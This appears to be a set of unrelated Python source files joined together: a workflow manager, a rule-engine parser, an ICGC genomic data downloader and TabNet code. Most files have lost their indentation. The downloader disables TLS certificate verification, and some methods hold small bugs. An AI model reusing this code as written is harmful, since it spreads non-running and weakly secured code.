print("\r{} dataset {:.2f}% Complete\t|{}{}{}|\t".format("training" if count == 0 else "validation",ratio*100,"\u2588"*int(ratio*size),">" if ratio < 1 else "\u2588"," "*int((1-ratio)*size)),end="")
writer.close()
print("")
count += 1
if __name__ == "__main__":
try:
app.run(main)
except SystemExit:
pass
```
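The records written above use the standard TF object-detection feature names, so they can be read straight back with `tf.data` and `parse_single_example`. A short sanity-check sketch that decodes the image bytes and one bbox coordinate list; the feature spec below covers only the fields it needs:
```python
# Read a few examples back from the generated TFRecord for a sanity check.
import tensorflow as tf

feature_spec = {
    "image/encoded": tf.io.FixedLenFeature([], tf.string),
    "image/object/bbox/xmin": tf.io.VarLenFeature(tf.float32),
    "image/object/bbox/xmax": tf.io.VarLenFeature(tf.float32),
    "image/object/bbox/ymin": tf.io.VarLenFeature(tf.float32),
    "image/object/bbox/ymax": tf.io.VarLenFeature(tf.float32),
}

def parse(serialized):
    example = tf.io.parse_single_example(serialized, feature_spec)
    image = tf.io.decode_jpeg(example["image/encoded"], channels=3)
    xmin = tf.sparse.to_dense(example["image/object/bbox/xmin"])
    return image, xmin

dataset = tf.data.TFRecordDataset("data/train.tfrecord").map(parse).take(2)
for image, xmin in dataset:
    print(image.shape, xmin.numpy())
```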
|
{
"source": "jeyabalajis/serverless-workflow-manager",
"score": 2
}
|
#### File: serverless-workflow-manager/database/workflow_instance_repository.py
```python
from typing import Dict
from pymongo.database import Database
from entity.workflow import Workflow
from services.config.config_manager import ConfigManager
from services.config.env_util import EnvUtil
from services.database.db_util import DatabaseUtil
from services.utils.dict_util import DictUtil
import logging
import json
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
class WorkflowInstanceRepository:
__TABLE_NAME = "wf_workflow_instance"
__DB_NAME = ConfigManager(EnvUtil.get_env()).get_config("workflow_db")
db: Database = DatabaseUtil(db_name=__DB_NAME).get_db_object()
@classmethod
def find_one_by_business_ref_no(cls, *, business_ref_no: str) -> Workflow:
workflow_instance = cls.db[cls.__TABLE_NAME]
workflow_instance_record = workflow_instance.find_one(
{
"business_ref_no": business_ref_no
},
{
"_id": 0
}
)
return Workflow.from_json(workflow_instance_record)
@classmethod
def upsert(cls, *, workflow: Workflow):
workflow_dict: Dict = workflow.get_dict()
DictUtil.remove_key(workflow_dict, "version")
DictUtil.remove_key(workflow_dict, "updated_at")
wf_workflow_instance: Database = cls.db[cls.__TABLE_NAME]
wf_workflow_instance.find_one_and_update(
{
"business_ref_no": workflow_dict["business_ref_no"]
},
{
"$set": workflow_dict,
"$inc": {"version": 1},
"$currentDate": {"updated_at": {"$type": "date"}}
},
upsert=True)
```
#### File: serverless-workflow-manager/entity/start_workflow_event.py
```python
from typing import Dict
from entity.event import Event
class StartWorkflowEvent(Event):
def __init__(self, *, business_ref_no: str, component_name: str, **kwargs):
super().__init__(business_ref_no=business_ref_no, component_name=component_name, **kwargs)
self._event_type = "StartWorkflow"
@classmethod
def from_json(cls, *, event_json: Dict):
        return super(StartWorkflowEvent, cls).from_json(event_json=event_json)
```
#### File: serverless-workflow-manager/entity/workflow.py
```python
from typing import Dict, List, Union
from entity.stage import Stage
from entity.task import Task
from exceptions.workflow_type_error import WorkflowTypeError
from exceptions.workflow_value_error import WorkflowValueError
import logging
import json
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
class Workflow:
def __init__(self, *, workflow_name: str, component_name: str, stages: [Stage], **kwargs):
self.workflow_name = workflow_name
self.component_name = component_name
self.stages = stages
self.__validate_stages_type()
self.business_ref_no = None
for key, val in kwargs.items():
setattr(self, key, val)
@classmethod
def from_json(cls, workflow_json: Dict):
if "stages" not in workflow_json:
raise WorkflowValueError("stages node is mandatory")
if not isinstance(workflow_json["stages"], List):
raise WorkflowTypeError("stages node must be a List")
stages = [Stage.from_json(stage_json=stage_json) for stage_json in workflow_json["stages"]]
return Workflow(
workflow_name=workflow_json["workflow_name"],
component_name=workflow_json["component_name"],
stages=stages
)
@classmethod
def from_json_template(cls, workflow_json_template: Dict):
workflow: Workflow = cls.from_json(workflow_json_template)
for (ind, stage) in enumerate(workflow.stages):
if ind == 0:
stage.status = Stage.ACTIVE_STATUS
else:
stage.status = Stage.NOT_STARTED_STATUS
for task in stage.tasks:
task.status = Task.PENDING_STATUS
return workflow
def set_business_ref_no(self, *, business_ref_no: str):
self.business_ref_no = business_ref_no
def get_dict(self):
return json.loads(json.dumps(self, default=lambda o: o.__dict__))
def __validate_stages_type(self):
for stage in self.stages:
if not isinstance(stage, Stage):
raise WorkflowTypeError("all elements of stages must be of type Stage")
def all_dependencies_completed_for_a_task(self, *, stage: Stage, task: Task) -> bool:
if not task.parent_task:
return True
all_parents_completed = True
for parent_task in task.parent_task:
parent_task_record = self.get_task_by_name(stage=stage, task_name=parent_task)
all_parents_completed = all_parents_completed and (parent_task_record.status == Task.COMPLETED_STATUS)
return all_parents_completed
    def get_stage_by_name(self, *, stage_name: str) -> Union[Stage, None]:
for stage in self.stages:
if stage.stage_name == stage_name:
return stage
return None
    def get_stage_by_order(self, *, stage_order: int) -> Union[Stage, None]:
for stage in self.stages:
if stage.stage_order == stage_order:
return stage
return None
def get_active_stage(self) -> Stage:
for stage in self.stages:
if stage.status == Stage.ACTIVE_STATUS:
return stage
def get_task_by_name(self, *, stage: Stage, task_name: str) -> Union[Task, None]:
for workflow_stage in self.stages:
if not workflow_stage.stage_name == stage.stage_name:
continue
for workflow_task in workflow_stage.tasks:
if not workflow_task.task_name == task_name:
continue
return workflow_task
return None
def mark_stage_as_completed(self, *, stage: Stage):
"""
Mark the stage passed in as COMPLETED and ACTIVATE the next stage (if any)
:param stage:
:return:
"""
for workflow_stage in self.stages:
if workflow_stage.stage_name == stage.stage_name:
workflow_stage.status = Stage.COMPLETED_STATUS
next_stage = self.get_stage_by_order(stage_order=workflow_stage.stage_order + 1)
if next_stage is not None:
next_stage.status = Stage.ACTIVE_STATUS
def mark_task_as_completed(self, *, stage: Stage, task: Task):
self.__update_task(stage=stage, task=task, status=Task.COMPLETED_STATUS)
def mark_task_as_pending(self, *, stage: Stage, task: Task):
self.__update_task(stage=stage, task=task, status=Task.PENDING_STATUS)
def mark_task_as_failed(self, *, stage: Stage, task: Task):
self.__update_task(stage=stage, task=task, status=Task.PENDING_STATUS)
def mark_task_as_scheduled(self, *, stage: Stage, task: Task):
self.__update_task(stage=stage, task=task, status=Task.SCHEDULED_STATUS)
def __update_task(self, *, stage: Stage, task: Task, status: str):
for workflow_stage in self.stages:
if workflow_stage.stage_name == stage.stage_name:
for workflow_task in workflow_stage.tasks:
if workflow_task.task_name == task.task_name:
workflow_task.status = status
def schedule_pending_tasks_for_stage(self, *, stage: Stage, pending_tasks: [Task]):
for pending_task in pending_tasks:
if self.all_dependencies_completed_for_a_task(stage=stage, task=pending_task):
self.mark_task_as_scheduled(stage=stage, task=pending_task)
def find_and_schedule_tasks(self):
"""
:return:
The workflow instance is organized as a set of stages & a set of tasks inside each stage.
At any point in time, only one stage is ACTIVE.
Logic:
For the instance, get the current active stage.
if active stage is found
[1] get pending tasks & schedule them, provided their dependencies are completed
if no pending tasks, mark current stage as closed, get the next active stage & repeat [1]
if no active stage, just close the workflow and return
if active stage is not found
this is an instance with no active stage, just close the workflow and return
Please note that the workflow manager DOES NOT WAIT or SLEEP. It reacts based on events.
        Upon a StartWorkflow event, the tasks eligible to be scheduled are scheduled.
        When these tasks are marked completed (TaskCompleted), the next set of eligible tasks in the stage is scheduled.
        When there are no more tasks to schedule in a stage, the next stage is activated and the process repeats.
"""
find_tasks = True
while find_tasks:
active_stage = self.get_active_stage()
# If no active stages are found, the whole workflow is done
if active_stage is None:
find_tasks = False
continue
# Get pending tasks for the active stage
pending_tasks = active_stage.get_pending_tasks()
if pending_tasks:
self.schedule_pending_tasks_for_stage(stage=active_stage, pending_tasks=pending_tasks)
find_tasks = False
else:
# If all tasks are completed, mark stage as completed and go to the next stage
if active_stage.all_tasks_completed():
self.mark_stage_as_completed(stage=active_stage)
else:
# Tasks are SCHEDULED and yet to be done.
find_tasks = False
print("done scheduling")
```
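`from_json` and `find_and_schedule_tasks` operate on a template with stages ordered by `stage_order`, each holding tasks that may declare `parent_task` dependencies. A hedged illustration of that shape follows: the field names come from the accessors above, the stage and some task names are borrowed from the test suite further down, the remaining names are made up, and the status strings merely stand in for the `Stage.*_STATUS` / `Task.*_STATUS` constants defined in `entity.stage` and `entity.task`:
```python
# Hedged illustration of a workflow template dict, shaped like the samples consumed above.
sample_workflow = {
    "workflow_name": "food_delivery",
    "component_name": "order_service",
    "stages": [
        {
            "stage_name": "ORDER",
            "stage_order": 1,
            "status": "ACTIVE",          # placeholder for Stage.ACTIVE_STATUS
            "tasks": [
                {"task_name": "confirm_order", "status": "PENDING", "parent_task": []},
                {"task_name": "confirm_payment", "status": "PENDING", "parent_task": ["confirm_order"]},
            ],
        },
        {
            "stage_name": "PREPARE",
            "stage_order": 2,
            "status": "NOT_STARTED",     # placeholder for Stage.NOT_STARTED_STATUS
            "tasks": [
                {"task_name": "prepare_food", "status": "PENDING", "parent_task": []},
                {"task_name": "confirm_delivery", "status": "PENDING", "parent_task": ["prepare_food"]},
            ],
        },
    ],
}

# Scheduling walks the ACTIVE stage, schedules tasks whose parents are completed,
# and only moves to the next stage once every task in the current one is done.
print(sample_workflow["stages"][0]["tasks"][1])
```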
#### File: services/database/db_cache.py
```python
from pymongo import MongoClient
class DatabaseCache:
db_cache = {}
@classmethod
def set_db_cache(cls, *, db_name: str, db_connection: MongoClient):
cls.db_cache[db_name] = db_connection
@classmethod
def get_db_cache(cls, *, db_name: str):
if db_name in cls.db_cache:
return cls.db_cache[db_name]
return None
```
#### File: services/secrets/secrets_manager.py
```python
import base64
import boto3
from botocore.exceptions import ClientError
from exceptions.workflow_run_time_error import WorkflowRunTimeError
from services.config.env_util import EnvUtil
class SecretsManager:
SERVICE_NAME = 'secretsmanager'
REGION_NAME = 'ap-south-1'
def __init__(self, *, aws_profile_name: str = None):
self.aws_profile_name = aws_profile_name
self.client = None
self.__init_client_session()
def __init_client_session(self):
if self.aws_profile_name is not None:
aws_profile_name = self.aws_profile_name
else:
aws_profile_name = EnvUtil.get_aws_profile_name()
print("aws profile name: {}".format(aws_profile_name))
if aws_profile_name is None:
session = boto3.session.Session()
else:
session = boto3.session.Session(profile_name=aws_profile_name)
self.client = session.client(
service_name=self.SERVICE_NAME,
region_name=self.REGION_NAME
)
def get_secret(self, *, secret_name: str):
try:
get_secret_value_response = self.client.get_secret_value(
SecretId=secret_name
)
except ClientError as e:
import traceback
raise WorkflowRunTimeError(traceback.format_exc(e))
else:
# Decrypts secret using the associated KMS CMK.
# Depending on whether the secret is a string or binary, one of these fields will be populated.
if 'SecretString' in get_secret_value_response:
secret = get_secret_value_response['SecretString']
return secret
else:
decoded_binary_secret = base64.b64decode(get_secret_value_response['SecretBinary'])
return decoded_binary_secret
```
#### File: services/utils/dict_util.py
```python
from typing import Dict, Any
class DictUtil:
@classmethod
def remove_key(cls, d: Dict, key: Any):
r = dict(d)
if key in r:
del r[key]
return r
```
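`remove_key` returns a pruned copy rather than mutating its argument, so the result has to be captured by the caller. A one-line illustration:
```python
# remove_key does not mutate in place; use the returned copy.
from services.utils.dict_util import DictUtil

doc = {"business_ref_no": "BRN-1", "version": 3}
doc = DictUtil.remove_key(doc, "version")
print(doc)  # {'business_ref_no': 'BRN-1'}
```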
#### File: jeyabalajis/serverless-workflow-manager/test_workflow.py
```python
import json
from unittest import TestCase
from entity.stage import Stage
from entity.workflow import Workflow
class TestWorkflow(TestCase):
@classmethod
def get_sample_workflow_instance(cls):
with open("./samples/sample_workflow_instance.json") as workflow_instance_file:
return json.load(workflow_instance_file)
def test_all_dependencies_completed_false(self):
workflow_object = Workflow.from_json(workflow_json=self.get_sample_workflow_instance())
stage = workflow_object.get_stage_by_name(stage_name="PREPARE")
task = workflow_object.get_task_by_name(stage=stage, task_name="confirm_delivery")
all_deps_completed = workflow_object.all_dependencies_completed_for_a_task(stage=stage, task=task)
assert all_deps_completed is False
def test_all_dependencies_completed_true(self):
workflow_object = Workflow.from_json(workflow_json=self.get_sample_workflow_instance())
stage = workflow_object.get_stage_by_name(stage_name="ORDER")
task = workflow_object.get_task_by_name(stage=stage, task_name="confirm_order")
all_deps_completed = workflow_object.all_dependencies_completed_for_a_task(stage=stage, task=task)
assert all_deps_completed is True
def test_get_active_stage(self):
workflow_object = Workflow.from_json(workflow_json=self.get_sample_workflow_instance())
active_stage = workflow_object.get_active_stage()
assert active_stage.status == Stage.ACTIVE_STATUS
def test_mark_stage_as_completed(self):
workflow_object = Workflow.from_json(workflow_json=self.get_sample_workflow_instance())
current_active_stage = workflow_object.get_active_stage()
workflow_object.mark_stage_as_completed(stage=current_active_stage)
next_active_stage = workflow_object.get_active_stage()
print("current: {} next: {}".format(current_active_stage.stage_name, next_active_stage.stage_name))
assert next_active_stage.stage_order == current_active_stage.stage_order + 1
assert (
current_active_stage.status == Stage.COMPLETED_STATUS
and next_active_stage.status == Stage.ACTIVE_STATUS
)
workflow_object.mark_stage_as_completed(stage=next_active_stage)
next_next_active_stage = workflow_object.get_active_stage()
assert next_next_active_stage is None
def test_find_and_schedule_tasks(self):
workflow_object = Workflow.from_json(workflow_json=self.get_sample_workflow_instance())
workflow_object.find_and_schedule_tasks()
active_stage = workflow_object.get_active_stage()
pending_tasks = active_stage.get_pending_tasks()
assert pending_tasks is not None and len(pending_tasks) == 1
scheduled_tasks = active_stage.get_scheduled_tasks()
for task in scheduled_tasks:
workflow_object.mark_task_as_completed(stage=active_stage, task=task)
workflow_object.find_and_schedule_tasks()
active_stage = workflow_object.get_active_stage()
pending_tasks = active_stage.get_pending_tasks()
scheduled_tasks = active_stage.get_scheduled_tasks()
assert len(pending_tasks) == 0 and len(scheduled_tasks) == 1
```
|
{
"source": "jeyabalajis/simple-serverless-rule-engine",
"score": 2
}
|
#### File: common/database/db_utils.py
```python
import json
import logging
from pymongo import MongoClient
from common.configure.config import get_config
from common.database import db_cache
from common.secrets_manager import secrets_manager_service
__logger = logging.getLogger(__name__)
def __is_empty(any_structure):
if any_structure:
return False
else:
return True
def init_rule_db(db):
"""
:param db:
:return:
"""
db_cache.set_db_cache("rule_db", db)
def get_db_object(db_name) -> object:
"""
:type db_name: object
:return: pymongo client object
"""
db_handle = db_cache.get_db_cache(db_name)
if not __is_empty(db_handle):
__logger.info("sending db object from cache!")
return db_handle
else:
__logger.info("inside get_db_object with db name as: " + db_name)
db_credentials_id = get_config("db_credentials_id")
db_secrets = secrets_manager_service.get_secret(db_credentials_id)
db_secrets = json.loads(db_secrets)
db_uri = db_secrets["db_url"]
db_username = db_secrets["user_name"]
db_pwd = db_secrets["password"]
client = MongoClient(db_uri, username=db_username, password=db_pwd)
__db_name = get_config(db_name)
db = client[__db_name]
db_cache.set_db_cache(db_name, db)
return db
def get_dict_from_cursor(p_cursor):
"""
:param p_cursor:
:return:
"""
r_dict = {}
if not __is_empty(p_cursor):
r_dict = [doc for doc in p_cursor]
return r_dict
```
#### File: parser/service/rule_parser.py
```python
import logging
import operator
from common.functions import report
from common.configure.config import get_config
from common.database import rule_db_functions as rule_dao
from common.database.db_utils import init_rule_db
__logger = logging.getLogger(__name__)
__recursion_depth = 0
__facts = {}
__operator_mapping = {
"<=": operator.le,
"<": operator.lt,
">=": operator.ge,
">": operator.gt,
"==": operator.eq,
"<>": operator.ne,
"is_none": operator.eq,
"between": "between"
}
__rule_results = {}
def __is_empty(any_structure):
if any_structure:
return False
else:
return True
# Error report gen function
def __report(code, message):
return {"code": code, "message": message}
def __get_func_for_operator(p_operator):
"""
:param operator:
:return:
"""
global __operator_mapping
if p_operator in __operator_mapping:
return __operator_mapping[p_operator]
else:
return None
def __evaluate_numeric(p_value, p_operator, target_value):
"""
:param p_value:
:param p_operator:
:param target_value:
:return:
"""
if p_operator == "is_none":
return p_value is None
else:
try:
operator_func = __get_func_for_operator(p_operator)
if operator_func == "between":
operator_func_gte = __get_func_for_operator(">=")
operator_func_lte = __get_func_for_operator("<=")
return (
operator_func_gte(p_value, target_value["low"])
and
operator_func_lte(p_value, target_value["high"])
)
else:
return operator_func(p_value, target_value)
        except Exception:
import traceback
__logger.error("Unhandled exception while evaluating numeric!!!")
__logger.error(traceback.format_exc())
return False
def __evaluate_string(p_value, p_operator, target_value):
    """
    :param p_value:
    :param p_operator:
    :param target_value:
    :return:
    """
    if p_operator == "in_list":
        return p_value in target_value
    if p_operator == "contains":
        return target_value in p_value
    if p_operator == "is_none":
        return target_value == p_value
    if p_operator == "equals":
        return target_value == p_value
    # unrecognized operators evaluate to False instead of returning None implicitly
    return False
def __parse_and_execute_token(rule_antecedent, eval_parameter):
"""
:rtype: object
:param rule_antecedent:
:return:
"""
# __logger.info("token name: " + rule_antecedent["token_name"])
# __logger.info("token type: " + rule_antecedent["token_type"])
# __logger.info("token caty: " + rule_antecedent["token_category"])
# __logger.info("operator: " + rule_antecedent["operator"])
if rule_antecedent["token_type"] == "numeric":
if "eval_value" not in rule_antecedent:
rule_antecedent["eval_value"] = None
# __logger.info("evaluation vale: " + str(rule_antecedent["eval_value"]))
return __evaluate_numeric(eval_parameter, rule_antecedent["operator"], rule_antecedent["eval_value"])
if rule_antecedent["token_type"] == "string":
if "eval_value" not in rule_antecedent:
rule_antecedent["eval_value"] = None
return __evaluate_string(eval_parameter, rule_antecedent["operator"], rule_antecedent["eval_value"])
def __evaluate_token(rule_antecedent):
"""
:param rule_antecedent:
:return:
"""
if "token_category" in rule_antecedent and "token_type" in rule_antecedent:
if rule_antecedent["token_category"] == "organic":
global __facts
if rule_antecedent["token_name"] in __facts:
# global __facts
rule_antecedent["token_value"] = __facts[rule_antecedent["token_name"]]
token_result = __parse_and_execute_token(rule_antecedent, __facts[rule_antecedent["token_name"]])
rule_antecedent["token_result"] = token_result
return token_result
else:
return False
if rule_antecedent["token_category"] == 'inorganic':
child_rule_lexicon = rule_dao.get_a_rule(rule_antecedent["child_rule_name"])
            # __compute_score expects (rule_lexicon, parent, depth); the child rule is
            # assumed to be scored as a non-parent starting at depth 0
            child_rule_score = __compute_score(child_rule_lexicon, False, 0)
token_result = __parse_and_execute_token(rule_antecedent, child_rule_score)
rule_antecedent["token_result"] = token_result
return token_result
else:
return False
def __evaluate_rule_antecedent(rule_antecedent, condition):
"""
:param rule_antecedent:
:param condition:
:return:
"""
global __recursion_depth
__recursion_depth = __recursion_depth + 1
_max_recursion_depth = get_config('max_recursion_depth')
    if __is_empty(_max_recursion_depth):
        # default to a maximum depth of 5 when no value is configured
        _max_recursion_depth = 5
if __recursion_depth > _max_recursion_depth:
return False
truth = True
# in when_any, any one constituent has to be true
if condition == "@when_any":
truth = False
# in when_all, every constituent has to be true
if condition == "@when_all":
truth = True
rule_antecedents = []
if type(rule_antecedent).__name__ == 'dict':
rule_antecedents.append(rule_antecedent)
if type(rule_antecedent).__name__ == 'list':
rule_antecedents = rule_antecedent
for constituent in rule_antecedents:
if "@when_all" in constituent:
constituent_result = __evaluate_rule_antecedent(constituent["@when_all"], "@when_all")
if "@when_any" in constituent:
constituent_result = __evaluate_rule_antecedent(constituent["@when_any"], "@when_any")
if "token_name" in constituent:
# __logger.info("single token case. evaluate token")
constituent_result = __evaluate_token(constituent)
if condition == "@when_any":
truth = truth or constituent_result
if condition == "@when_all":
truth = truth and constituent_result
return truth
def __evaluate_rule_set(rule_name, rule_set, parent):
"""
:param rule_name:
:param rule_set:
:param parent:
:return:
"""
rule_set_result = {
"set_name": rule_set["set_name"],
"weight": rule_set["weight"],
"rule_rows": []
}
weighted_score = 0
if "rule_rows" in rule_set:
unweighted_score = 0
for rule_row in rule_set["rule_rows"]:
global __recursion_depth
__recursion_depth = 0
rule_row_result = False
if "antecedent" in rule_row:
rule_row_result = __evaluate_rule_antecedent(rule_row["antecedent"], "@when_all")
if rule_row_result:
unweighted_score = rule_row["consequent"]["score"]
rule_row["evaluated"] = True
rule_set_result["rule_rows"].append(rule_row)
break
else:
rule_row["evaluated"] = False
rule_set_result["rule_rows"].append(rule_row)
weighted_score = unweighted_score * rule_set["weight"]
rule_set_result["unweighted_score"] = unweighted_score
rule_set_result["weighted_score"] = weighted_score
if parent:
__assign_rule_set_to_results(rule_set_result)
else:
rule_set_result_wrapper = dict(rule_name=rule_name, rule_results=rule_set_result)
__assign_rule_set_to_results(rule_set_result_wrapper)
return weighted_score
def __evaluate_rule_decision_set(rule_name, rule_set, parent):
"""
:param rule_name:
:param rule_set:
:param parent:
:return:
"""
rule_set_result = {
"set_name": rule_set["set_name"],
"rule_rows": []
}
decision = 'none'
if "rule_rows" in rule_set:
for rule_row in rule_set["rule_rows"]:
global __recursion_depth
__recursion_depth = 0
rule_row_result = False
if "antecedent" in rule_row:
rule_row_result = __evaluate_rule_antecedent(rule_row["antecedent"], "@when_all")
if rule_row_result:
# __logger.info("This rule row has evaluated as true!!! returning consequent")
decision = rule_row["consequent"]["decision"]
rule_row["evaluated"] = True
rule_set_result["rule_rows"].append(rule_row)
break
else:
# __logger.info("This rule row has evaluated as false :( continue evaluating the next row")
rule_row["evaluated"] = False
rule_set_result["rule_rows"].append(rule_row)
rule_set_result["decision"] = decision
if parent:
__assign_rule_set_to_results(rule_set_result)
else:
rule_set_result_wrapper = dict(rule_name=rule_name, rule_results=rule_set_result)
__assign_rule_set_to_results(rule_set_result_wrapper)
return decision
def __compute_score(rule_lexicon, parent, depth):
"""
:param rule_lexicon:
:return:
"""
total_score = 0
if "rule_set" in rule_lexicon:
for rule_set in rule_lexicon["rule_set"]:
score = 0
unweighted_score = 0
if "rule_set_type" in rule_set:
if rule_set["rule_set_type"] == 'evaluate':
score = __evaluate_rule_set(rule_lexicon["rule_name"], rule_set, parent)
if rule_set["rule_set_type"] == 'compute':
child_rule_lexicon = rule_dao.get_a_rule(rule_set["rule_name"])
if __is_empty(child_rule_lexicon):
score = 0
unweighted_score = 0
else:
unweighted_score = __compute_score(child_rule_lexicon, False, depth + 1)
score = unweighted_score * rule_set["weight"]
child_rule_result = dict(rule_name=child_rule_lexicon["rule_name"], weighted_score=score,
unweighted_score=unweighted_score, depth=depth + 1)
__assign_child_rule_to_results(child_rule_result)
total_score = total_score + score
return total_score
def __get_decision(rule_lexicon, parent):
"""
:param rule_lexicon:
:return:
"""
decision = 'none'
if "rule_set" in rule_lexicon:
rule_set = rule_lexicon["rule_set"]
decision = __evaluate_rule_decision_set(rule_lexicon["rule_name"], rule_set, parent)
return decision
def __assign_rule_set_to_results(rule_set):
"""
:param rule_set:
:return:
"""
global __rule_results
__rule_results["result_set"].append(rule_set)
def __assign_child_rule_to_results(child_rule_results):
"""
:param rule_set:
:return:
"""
global __rule_results
__rule_results["child_rules"].append(child_rule_results)
def __populate_rule_results(tag, value):
"""
:param tag:
:param value:
:return:
"""
global __rule_results
__rule_results[tag] = value
def __init_rule_results(rule_lexicon):
"""
:param rule_lexicon:
:return:
"""
global __rule_results
__rule_results = {
"rule_name": rule_lexicon["rule_name"],
"rule_description": rule_lexicon["rule_description"],
"rule_type": rule_lexicon["rule_type"],
"result_set": [],
"child_rules": []
}
def execute_rule(rule_name, p_facts):
"""
    :param rule_name:
    :param p_facts:
:return:
"""
if __is_empty(rule_name):
__logger.error("rule name is mandatory!")
return report(1, "Rule name is mandatory")
if __is_empty(p_facts):
__logger.error("facts are mandatory!")
return report(1, "facts node is mandatory")
# if __is_empty(db):
# __logger.error("db handle mandatory!")
# return report(1, "database handle is mandatory")
#
# init_rule_db(db)
global __facts
__facts = p_facts
rule_lexicon = rule_dao.get_a_rule(rule_name)
if __is_empty(rule_lexicon):
return report(1, "Rule does not exist")
if "rule_type" in rule_lexicon:
try:
__init_rule_results(rule_lexicon)
if rule_lexicon["rule_type"] == "score":
__logger.info("calling compute score function")
total_score = __compute_score(rule_lexicon, True, 0)
__logger.info("$$$$$TOTAL SCORE$$$$$" + str(total_score))
__populate_rule_results('final_score', total_score)
if rule_lexicon["rule_type"] == "decision":
__logger.info("calling get decision function")
decision = __get_decision(rule_lexicon, True)
__logger.info("$$$$$FINAL DECISION$$$$$" + str(decision))
__populate_rule_results('final_decision', decision)
        except Exception:
import traceback
__logger.error(traceback.format_exc())
return report(1, traceback.format_exc())
else:
__logger.error("Rule type is not set for this rule")
return report(1, "Rule Type is not configured for this rule")
return report(0, __rule_results)
```
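A hedged usage sketch of `execute_rule`, assuming the rule database has been initialised beforehand and that a rule named `loan_eligibility` exists; the rule name, the facts, and the assumption that the shared `report(code, message)` helper returns a `{"code", "message"}` dict (mirroring the module's local `__report`) are all illustrative.
```python
# Illustrative only: rule name, facts, and the shape of report() are assumptions.
from common.database.db_utils import get_db_object, init_rule_db
from parser.service.rule_parser import execute_rule
init_rule_db(get_db_object("rule_db"))
facts = {"age": 35, "monthly_income": 42000, "employment_type": "salaried"}
result = execute_rule("loan_eligibility", facts)
if result["code"] == 0:
    # rule results carry final_score or final_decision plus per-rule-set details
    print(result["message"])
else:
    print("rule evaluation failed:", result["message"])
```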
|
{
"source": "jeyabbalas/mutational-signatures-data",
"score": 3
}
|
#### File: mutational-signatures-data/lib/icgc.py
```python
from pathlib import Path
import requests
from tqdm import tqdm
def get_filesize(pql_query: str,
datatype: str = "ssm") -> int:
"""
Calls an ICGC Data Portal API to retrieve the file size of the dataset
specified by a PQL query and a data type.
:param pql_query: PQL query to retrieve the dataset of interest.
:param datatype: data types e.g., "ssm" for simple somatic mutation,
"donor" for clinical dataset, "cnsm" for copy number somatic mutation,
etc.
:return: size of the specified dataset in bytes.
"""
url = f"https://dcc.icgc.org/api/v1/download/sizePQL?pql={pql_query}"
response = requests.get(url)
if response.status_code != 200:
raise IOError(f"GET {url} resulted in status code {response.status_code}")
file_sizes = response.json()["fileSize"]
for dataset in file_sizes:
if dataset["label"] == datatype:
return dataset["sizes"]
raise ValueError(f"GET {url} does not contain the {datatype} data type.")
def get_download_id(pql_query: str,
datatype: str = "ssm",
output_format: str = "TSV") -> str:
"""
Calls an ICGC Data Portal API to retrieve a download ID for the dataset
specified by a PQL query, a data type, and an output format.
:param pql_query: PQL query to retrieve the dataset of interest.
:param datatype: data types e.g., "ssm" for simple somatic mutation,
"donor" for clinical dataset, "cnsm" for copy number somatic mutation,
etc.
:param output_format: output data format. Supported formats: ["json", "TSV"].
:return: a download ID
"""
info = f"[{{\"key\":\"{datatype}\", \"value\":\"{output_format}\"}}]"
url = f"https://dcc.icgc.org/api/v1/download/submitPQL?pql={pql_query}&info={info}"
response = requests.get(url)
if response.status_code != 200:
raise IOError(f"GET {url} resulted in status code {response.status_code}")
return response.json()["downloadId"]
def download_data(output_filepath: Path,
download_id: str,
file_size: int) -> None:
"""
Calls an ICGC Data Portal API to download a gzipped file for the dataset
specified by a download ID.
:param output_filepath: output file directory
:param download_id: download ID obtained from API call from get_download_id()
:param file_size: dataset file size in bytes
"""
url = f"https://dcc.icgc.org/api/v1/download/{download_id}"
headers = {"Accept": "application/x-gzip"}
progress_bar = tqdm(total=file_size, unit="iB", unit_scale=True)
response = requests.get(url, headers=headers,
verify=False, stream=True)
if response.status_code != 200:
raise IOError(f"GET {url} resulted in status code {response.status_code}")
with open(output_filepath.with_suffix(".tsv.gz"), "wb") as f:
for data in response.iter_content(1024 ** 2):
progress_bar.update(len(data))
f.write(data)
progress_bar.close()
def download_icgc_datasets(output_dir: Path,
projects: list[str],
datatype: str = "ssm",
analysis_type: str = "WGS",
output_format: str = "TSV") -> None:
"""
Download BRCA project datasets from ICGC Data Portal.
:param output_dir: output directory to download data in.
:param projects: a list of projects in ICGC to extract data from.
:param datatype: data types e.g., "ssm" for simple somatic mutation,
"donor" for clinical dataset, "cnsm" for copy number somatic mutation,
etc.
:param analysis_type: data analysis type. E.g., WGS for whole genome sequencing,
WXS for whole exome sequencing, etc.
:param output_format: output data format. Supported formats: ["json", "TSV"].
"""
supported_formats = ["TSV", "json"]
if output_format not in supported_formats:
raise ValueError(f"Output format {output_format} isn't supported. "
f"Supported formats: {supported_formats}")
if not output_dir.exists():
output_dir.mkdir()
for project in projects:
pql_query = f"select(*),in(donor.projectId,'{project}')," \
f"in(donor.availableDataTypes,'{datatype}')," \
f"in(donor.analysisTypes,'{analysis_type}')"
file_size = get_filesize(pql_query, datatype)
print(f"Downloading {datatype} data ({(file_size / 1024 ** 2):.2f} MBs) "
f"from project {project}.")
download_id = get_download_id(pql_query, datatype, output_format)
output_filepath = output_dir / f"{project}_{datatype}_{analysis_type}"
download_data(output_filepath, download_id, file_size)
print("Done.")
```
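A short usage sketch of the ICGC helpers above; the project codes and output directory are illustrative, and the calls hit the live ICGC Data Portal API.
```python
from pathlib import Path
from lib.icgc import download_icgc_datasets
# Hypothetical ICGC project codes; substitute the projects of interest.
projects = ["BRCA-EU", "BRCA-UK"]
download_icgc_datasets(
    output_dir=Path("icgc_data"),
    projects=projects,
    datatype="ssm",        # simple somatic mutations
    analysis_type="WGS",   # whole genome sequencing
    output_format="TSV",
)
# Each project is written to icgc_data/<project>_ssm_WGS.tsv.gz
```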
|
{
"source": "jeyabbalas/tabnet",
"score": 3
}
|
#### File: tabnet/tf_tabnet/tabnet_model.py
```python
from typing import Dict, List, Tuple, Optional, Union
import tensorflow as tf
import tensorflow_addons as tfa
from utils import entmax15
class GLULayer(tf.keras.layers.Layer):
def __init__(
self,
units: int = 16,
fc_layer: Optional[tf.keras.layers.Dense] = None,
virtual_batch_size: Optional[int] = None,
momentum: float = 0.98,
**kwargs
):
"""
Creates a layer with a fully-connected linear layer, followed by batch
normalization, and a gated linear unit (GLU) as the activation function.
Parameters:
-----------
units: int
Number of units in layer. Default (16).
fc_layer:tf.keras.layers.Dense
This is useful when you want to create a GLU layer with shared parameters. This
